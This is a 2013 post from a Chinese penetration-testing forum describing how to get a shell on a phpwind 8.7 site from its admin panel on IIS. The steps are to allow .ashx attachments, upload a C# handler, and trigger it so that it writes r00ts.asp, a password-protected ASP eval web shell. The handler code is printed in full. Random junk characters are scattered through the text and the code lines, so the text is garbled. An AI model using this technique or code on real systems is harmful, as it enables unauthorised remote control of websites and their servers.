中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小2 F1 Y. h; D& t. X1 d" G

+ k) ]& D7 C. }7 n2 Q' x$ Q. [! ?群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx: ^6 V9 b0 K+ Y! \% W  l/ y! J

& y) Y/ S+ s7 k8 \+ i; k, o# V发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
+ C" [4 X8 [; R% t
! H( s; ]! O0 s8 m  e然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
; C- i& g' b1 r) o5 v + {& C7 T: R4 H- p9 G# \/ V: u( }
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
/ `8 V' z) f5 ^  ?% G3 W
, F3 ]- Q; w7 }0 d  D! @下面是代码:, j; R9 ]" i) A( {& u

0 `  P4 l2 ^  @( E. x% Z* b* B<%@ WebHandler Language="C#"Class="Handler" %>+ j: F: t* k9 C/ @& S% O6 S
using System;$ l8 C, a6 g' A+ u" T6 C& L
using System.Web;
: P1 ?7 b5 l) u3 H+ W+ dusing System.IO;
4 D- U/ _5 Y' i- Z# bpublic class Handler : IHttpHandler {1 {, h" l/ b2 [' q
public void ProcessRequest (HttpContext context) {7 ]- W+ ~2 h- v0 X. M) x2 z0 q5 Z
context.Response.ContentType = "text/plain";
- K& w1 P3 e7 ?3 {StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
6 H" s* l8 M7 p$ x, efile1.Write("<%eval request(\"r00ts\")%>");. P8 v+ @8 R. B* g* F
file1.Flush();
+ U, C. n9 k, p0 [+ Rfile1.Close();8 k+ y' k; ?9 k3 y5 X% \: `2 q
}% h0 y3 t* K( c6 l
public bool IsReusable {4 v/ G0 T' R1 ~2 P
get {
3 ?0 t, V$ T) oreturn false;6 f6 n# j0 D% B/ {0 ]
}
& ]3 V  V$ {3 v& o}- S- l- h% H& i; J, c$ W4 f
}$ n* T$ ~0 }; h4 O4 M/ z




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2